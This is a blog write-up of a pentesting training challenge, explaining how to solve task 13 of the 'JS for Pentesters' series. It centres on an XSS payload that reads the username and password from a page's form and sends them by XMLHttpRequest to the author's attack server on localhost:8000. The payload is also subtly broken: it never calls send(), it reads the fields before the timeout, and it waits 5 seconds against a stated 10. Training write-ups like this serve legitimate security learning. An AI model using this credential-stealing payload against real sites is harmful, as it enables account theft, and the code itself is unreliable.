XSS - posting with XMLHttpRequest(): JS for Pentesters task 13

Oct 31, 2014 • jsp, javascript, xss, security-tube

writeup for task-13 of the JS for pentesters series by security-tube - XSS posting with XMLHTTPRequest()

We have already completed the challenge in which we steal from Auto Complete. Now this is the same challenge but the condition is that we need to use XMLHttpRequest to complete the challenge. If you are not familiar with XMLHttpRequest, I strongly recommend you to read the post “Everything you should know about XMLHttpRequest()”. Reading about XMLHttpRequest() basics will help you understand more and how to crack this challenge.

JS for Pentesters task 13

Our objectives are Write JS attack code which waits for 10 seconds, then submits the form automatically to your Attack server using an XMLHttpRequest() call. Let us see how this can be done.

Basically what we need is to use setTimeout() function in JavaScript which will execute a function after a specified amount of time. So we can use it run the function we defined and within that, we can specify to post the credentials to the server we host. The payload looks like this:

    var user = document.forms[0].elements[0].value;
    var pass = document.forms[0].elements[1].value;    
    window.setTimeout( function () {
    var request = new XMLHttpRequest();
    request.open("GET", "http://localhost:8000/?user="+user+"&pass="+pass, true);
    }, 5000);

So lets see what are we doing here. First we are declaring 2 variables with which we takes in the username and password that the user enters. Then we use the window.setTimeout() function which will execute a function after 5000 milliseconds or 5 seconds. Inside the function, we are declaring a new XMLHttpRequest() object using which we are sending data to our server (I used to host an HTTP server locally).


1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Security Engineer @flipkart | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | certs - eWDP, OSCP